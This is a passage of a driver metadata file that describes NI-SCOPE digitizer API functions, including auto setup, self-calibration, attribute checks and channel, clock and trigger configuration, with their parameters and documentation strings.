'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the actual number of points the digitizer acquires for each\nchannel; NI-SCOPE returns the value held in the\nNISCOPE_ATTR_HORZ_RECORD_LENGTH attribute.\n'
},
'name': 'recordLength',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'AddWaveformProcessing': {
'codegen_method': 'private',
'documentation': {
'description': '\nAdds one measurement to the list of processing steps that are completed\nbefore the measurement. The processing is added on a per channel basis,\nand the processing measurements are completed in the same order they are\nregistered. All measurement library parameters—the attributes starting\nwith NISCOPE_ATTR_MEAS—are cached at the time of registering the\nprocessing, and this set of parameters is used during the processing\nstep. The processing measurements are streamed, so the result of the\nfirst processing step is used as the input for the next step. The\nprocessing is done before any other measurements.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `array\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(array_measurements_refs)>`__\nto add.\n'
},
'enum': 'ArrayMeasurement',
'name': 'measFunction',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'AdjustSampleClockRelativeDelay': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures the relative sample clock delay (in seconds) when using the\ninternal clock. Each time this function is called, the sample clock is\ndelayed from the reference clock by the specified amount of time.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'AutoSetup': {
'documentation': {
'description': '\nAutomatically configures the instrument. When you call this function,\nthe digitizer senses the input signal and automatically configures many\nof the instrument settings. If a signal is detected on a channel, the\ndriver chooses the smallest available vertical range that is larger than\nthe signal range. For example, if the signal is a 1.2 V\\ :sub:`pk-pk`\nsine wave, and the device supports 1 V and 2 V vertical ranges, the\ndriver will choose the 2 V vertical range for that channel.\n\nIf no signal is found on any analog input channel, a warning is\nreturned, and all channels are enabled. A channel is considered to have\na signal present if the signal is at least 10% of the smallest vertical\nrange available for that channel.\n\nThe following settings are changed:\n',
'table_body': [
[
'**General**'
],
[
'Acquisition mode',
'Normal'
],
[
'Reference clock',
'Internal'
],
[
'**Vertical**'
],
[
'Vertical coupling',
'AC (DC for NI 5621)'
],
[
'Vertical bandwidth',
'Full'
],
[
'Vertical range',
'Changed by auto setup'
],
[
'Vertical offset',
'0 V'
],
[
'Probe attenuation',
'Unchanged by auto setup'
],
[
'Input impedance',
'Unchanged by auto setup'
],
[
'**Horizontal**'
],
[
'Sample rate',
'Changed by auto setup'
],
[
'Min record length',
'Changed by auto setup'
],
[
'Enforce realtime',
'True'
],
[
'Number of Records',
'Changed to 1'
],
[
'**Triggering**'
],
[
'Trigger type',
'Edge if signal present, otherwise immediate'
],
[
'Trigger channel',
'Lowest numbered channel with a signal present'
],
[
'Trigger slope',
'Positive'
],
[
'Trigger coupling',
'DC'
],
[
'Reference position',
'50%'
],
[
'Trigger level',
'50% of signal on trigger channel'
],
[
'Trigger delay',
'0'
],
[
'Trigger holdoff',
'0'
],
[
'Trigger output',
'None'
]
]
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'CableSenseSignalStart': {
'codegen_method': 'no',
'documentation': {
'description': '\nGenerates the CableSense signal on all channels of an oscilloscope for which the signal is enabled, as configured by the CableSense Mode property.\n',
'note': 'You can call this VI only during an acquisition. If you call this VI while your oscilloscope is not acquiring, NI‑SCOPE generates an error.',
'table_body': [
[
'**Supported Devices**'
],
[
'PXIe-5110'
],
[
'PXIe-5111'
],
[
'PXIe-5113'
],
[
'PXIe-5160'
],
[
'PXIe-5162'
]
]
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'CableSenseSignalStop': {
'codegen_method': 'no',
'documentation': {
'description': '\nDisables the CableSense signal on all channels of an oscilloscope for which the signal is enabled.\n',
'table_body': [
[
'**Supported Devices**'
],
[
'PXIe-5110'
],
[
'PXIe-5111'
],
[
'PXIe-5113'
],
[
'PXIe-5160'
],
[
'PXIe-5162'
]
]
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'CalGetAdcVoltageEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'name': 'adcVoltageGain',
'type': 'ViReal32'
},
{
'direction': 'out',
'name': 'adcVoltageOffset',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
'CalGetFrEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'numCoefficients',
'type': 'ViInt32'
},
{
'direction': 'out',
'name': 'polynomialFitCoefficients',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
'CalGetSerialDacVoltageEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'name': 'serialDacVolts',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
'CalSelfCalibrate': {
'documentation': {
'description': '\nSelf-calibrates most NI digitizers, including all SMC-based devices and\nmost Traditional NI-DAQ (Legacy) devices. To verify that your digitizer\nsupports self-calibration, refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__.\n\nFor SMC-based digitizers, if the self-calibration is performed\nsuccessfully in a regular session, the calibration constants are\nimmediately stored in the self-calibration area of the EEPROM. If the\nself-calibration is performed in an external calibration session, the\ncalibration constants take effect immediately for the duration of the\nsession. However, they are not stored in the EEPROM until\nniScope_CalEnd is called with **action** set to\nNISCOPE_VAL_ACTION_STORE and no errors occur.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'Option.SELF_CALIBRATE_ALL_CHANNELS',
'direction': 'in',
'documentation': {
'description': '\nThe calibration option. Use VI_NULL for a normal self-calibration\noperation or NISCOPE_VAL_CAL_RESTORE_EXTERNAL_CALIBRATION to\nrestore the previous calibration.\n'
},
'enum': 'Option',
'name': 'option',
'type': 'ViInt32'
}
],
'python_name': 'self_cal',
'returns': 'ViStatus'
},
'CalSetAdcVoltageEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'adcVoltageGain',
'type': 'ViReal32'
},
{
'direction': 'in',
'name': 'adcVoltageOffset',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
'CalSetFrEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'numCoefficients',
'type': 'ViInt32'
},
{
'direction': 'out',
'name': 'polynomialFitCoefficients',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
'CalSetSerialDacVoltageEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'serialDacVolts',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViBoolean': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViBoolean attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViInt32': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViInt32 attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViInt64': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViInt64 attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViInt64'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViReal64': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViReal64 attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViSession': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViSession attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViString': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViString attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'ClearError': {
'codegen_method': 'no',
'documentation': {
'description': '\nClears the error information for the current execution thread and the\nIVI session you specify. If you pass VI_NULL for the Instrument Handle\nparameter, this function clears the error information only for the\ncurrent execution thread.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ClearInterchangeWarnings': {
'codegen_method': 'no',
'documentation': {
'description': 'Clears the list of current interchange warnings.',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ClearWaveformMeasurementStats': {
'codegen_method': 'private',
'documentation': {
'description': '\nClears the waveform stats on the channel and measurement you specify. If\nyou want to clear all of the measurements, use\nNISCOPE_VAL_ALL_MEASUREMENTS in the **clearableMeasurementFunction**\nparameter.\n\nEvery time a measurement is called, the statistics information is\nupdated, including the min, max, mean, standard deviation, and number of\nupdates. This information is fetched with\nniScope_FetchMeasurementStats. The multi-acquisition array measurements\nare also cleared with this function.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': '_ClearableMeasurement.ALL_MEASUREMENTS',
'direction': 'in',
'documentation': {
'description': '\nThe `scalar\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(scalar_measurements_refs)>`__\nor `array\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(array_measurements_refs)>`__\nto clear the stats for.\n'
},
'enum': 'ClearableMeasurement',
'name': 'clearableMeasurementFunction',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ClearWaveformProcessing': {
'codegen_method': 'private',
'documentation': {
'description': '\nClears the list of processing steps assigned to the given channel. The\nprocessing is added using the niScope_AddWaveformProcessing function,\nwhere the processing steps are completed in the same order in which they\nare registered. The processing measurements are streamed, so the result\nof the first processing step is used as the input for the next step. The\nprocessing is also done before any other measurements.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'Commit': {
'documentation': {
'description': '\nCommits to hardware all the parameter settings associated with the task.\nUse this function if you want a parameter change to be immediately\nreflected in the hardware. This function is not supported for\nTraditional NI-DAQ (Legacy) devices.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ConfigureAcquisition': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures how the digitizer acquires data and fills the waveform\nrecord.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the manner in which the digitizer acquires data and fills the\nwaveform record; NI-SCOPE sets NISCOPE_ATTR_ACQUISITION_TYPE to this\nvalue.\n\n**Defined Values**\n\nNISCOPE_VAL_NORMAL\n\nNISCOPE_VAL_FLEXRES\n\nNISCOPE_VAL_DDC\n',
'note': '\nNISCOPE_VAL_DDC applies to the NI 5620/5621 only. To use DDC mode in\nthe NI 5142/5622, leave **acquisitionType** set to NISCOPE_VAL_NORMAL\nand set NISCOPE_ATTR_DDC_ENABLED to True.\n'
},
'name': 'acquisitionType',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ConfigureAcquisitionRecord': {
'codegen_method': 'no',
'documentation': {
'description': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n\nConfigures the most commonly configured attributes of the instrument\nacquisition subsystem.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the time per record.\n\nUnits: Seconds.\n'
},
'name': 'timePerRecord',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass the minimum number of points you require in the record for each\nchannel. Call niScope_ActualRecordLength to obtain the actual record\nlength used.\n\nValid Values: 1 – available onboard memory\n'
},
'name': 'minNumPoints',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the position of the first point in the waveform record\nrelative to the trigger event.\n'
},
'name': 'acquisitionStartTime',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureChanCharacteristics': {
'documentation': {
'description': '\nConfigures the attributes that control the electrical characteristics of\nthe channel—the input impedance and the bandwidth.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe input impedance for the channel; NI-SCOPE sets\nNISCOPE_ATTR_INPUT_IMPEDANCE to this value.\n'
},
'name': 'inputImpedance',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe bandwidth for the channel; NI-SCOPE sets\nNISCOPE_ATTR_MAX_INPUT_FREQUENCY to this value. Pass 0 for this\nvalue to use the hardware default bandwidth. Pass –1 for this value to\nachieve full bandwidth.\n'
},
'name': 'maxInputFrequency',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureChannel': {
'codegen_method': 'no',
'documentation': {
'description': "\nThis function is included for compliance with the IviScope Class\nSpecification.\n\nConfigures the most commonly configured attributes of the instrument's\nchannel subsystem.\n"
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe channel to configure. For more information, refer to `channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm\',\'cvichannelstringsyntaxforc)>`__.\n\nDefault Value: "0"\n'
},
'name': 'channel',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the voltage range for the specified channel(s).'
},
'name': 'range',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nSelects the DC offset added to the specified channel(s).\n\nDefault Value: 0\n'
},
'name': 'offset',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify how you want the digitizer to couple the input signal for the\nchannel.\n\nDefined Values\n\nNISCOPE_VAL_AC (0)\n\nNISCOPE_VAL_DC (1)\n\nNISCOPE_VAL_GND (2)\n\nA certain amount of delay is required for the coupling capacitor to\ncharge after changing vertical coupling from DC to AC. This delay is\ntypically:\n\n| Low Impedance Source—150 ms\n| 10X Probe—1.5 s\n| 100X Probe—15 s\n'
},
'name': 'coupling',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the probe attenuation for the specified channel(s).\n\nDefault Value: 1.00\n\nValid Range: 1.00 – 100\n\nIf you have a probe with *y*\\ X attenuation, set this parameter to *y*.\nFor example, enter a value of 10 for a 10X probe.\n'
},
'name': 'probeAttenuation',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify whether to enable the digitizer to acquire data for the channel\nwhen you call niScope_InitiateAcquisition or niScope_ReadWaveform.\n\n| Default Value:\n| NISCOPE_VAL_TRUE (1)\n\nDefined Values\n\n| NISCOPE_VAL_TRUE (1)—Acquire data on this channel\n| NISCOPE_VAL_FALSE (0)—Do not acquire data on this channel\n'
},
'name': 'enabled',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'ConfigureClock': {
'codegen_method': 'no',
'documentation': {
'description': "\nConfigures the attributes for synchronizing the digitizer to a reference\nor sending the digitizer's reference clock output to be used as a\nsynchronizing clock for other digitizers.\n",
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the input source for the reference clock to which the 100 MHz\nsample clock is phase-locked. Refer to\nNISCOPE_ATTR_INPUT_CLOCK_SOURCE for more information.\n'
},
'name': 'inputClockSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': "\nSpecifies the output source for the reference clock to which another\nscope's sample clock can be phased-locked. Refer to\nNISCOPE_ATTR_OUTPUT_CLOCK_SOURCE for more information\n"
},
'name': 'outputClockSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nFor the NI 5102, specifies the line on which the sample clock is sent or\nreceived. For the NI 5112/5620/5621/5911, specifies the line on which\nthe one time sync pulse is sent or received. This line should be the\nsame for all devices to be synchronized. Refer to\nNISCOPE_ATTR_CLOCK_SYNC_PULSE_SOURCE for more information.\n'
},
'name': 'clockSyncPulseSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether you want the device to be a master or a slave. The\nmaster device is typically the originator of the trigger signal and\nclock sync pulse. For a standalone device, set this attribute to\nVI_FALSE.\n\nRefer to NISCOPE_ATTR_MASTER_ENABLE for more information.\n'
},
'name': 'masterEnabled',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'ConfigureEdgeTriggerSource': {
'codegen_method': 'no',
'documentation': {
'description': '\nSets the edge triggering attributes. An edge trigger occurs when the\ntrigger signal specified with the source parameter passes through the\nvoltage threshold specified with the level parameter and has the slope\nspecified with the slope parameter.\n\nThis function affects instrument behavior only if the triggerType is\nNISCOPE_VAL_EDGE. Set the trigger type and trigger coupling before\ncalling this function.\n\nIf the trigger source is one of the analog input channels, you must\nconfigure the vertical range, vertical offset, vertical coupling, probe\nattenuation, and the maximum input frequency before calling this\nfunction.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe voltage threshold for the trigger. Refer to\nNISCOPE_ATTR_TRIGGER_LEVEL for more information.\n'
},
'name': 'source',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe voltage threshold for the trigger. Refer to\nNISCOPE_ATTR_TRIGGER_LEVEL for more information.\n'
},
'name': 'level',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether you want a rising edge or a falling edge to trigger\nthe digitizer. Refer to NISCOPE_ATTR_TRIGGER_SLOPE for more\ninformation.\n'
},
'name': 'slope',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ConfigureEqualizationFilterCoefficients': {
'documentation': {
'description': '\nConfigures the custom coefficients for the equalization FIR filter on\nthe device. This filter is designed to compensate the input signal for\nartifacts introduced to the signal outside of the digitizer. Because\nthis filter is a generic FIR filter, any coefficients are valid.\nCoefficient values should be between +1 and –1.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of coefficients being passed in the **coefficients** array.'
},
'name': 'numberOfCoefficients',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe custom coefficients for the equalization FIR filter on the device.\nThese coefficients should be between +1 and –1. You can obtain the\nnumber of coefficients from the\n`NISCOPE_ATTR_EQUALIZATION_NUM_COEFFICIENTS <cviNISCOPE_ATTR_EQUALIZATION_NUM_COEFFICIENTS.html>`__\nattribute. The\n`NISCOPE_ATTR_EQUALIZATION_FILTER_ENABLED <cviNISCOPE_ATTR_EQUALIZATION_FILTER_ENABLED.html>`__\nattribute must be set to TRUE to enable the filter.\n'
},
'name': 'coefficients',
'size': {
'mechanism': 'len',
'value': 'numberOfCoefficients'
},
'type': 'ViReal64[]'
}
],
'returns': 'ViStatus'
},
'ConfigureHorizontalTiming': {
'documentation': {
'description': '\nConfigures the common properties of the horizontal subsystem for a\nmultirecord acquisition in terms of minimum sample rate.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe sampling rate for the acquisition. Refer to\nNISCOPE_ATTR_MIN_SAMPLE_RATE for more information.\n'
},
'name': 'minSampleRate',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe minimum number of points you need in the record for each channel;\ncall niScope_ActualRecordLength to obtain the actual record length\nused.\n\nValid Values: Greater than 1; limited by available memory\n'
},
'name': 'minNumPts',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe position of the Reference Event in the waveform record specified as\na percentage.\n'
},
'name': 'refPosition',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of records to acquire'
},
'name': 'numRecords',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
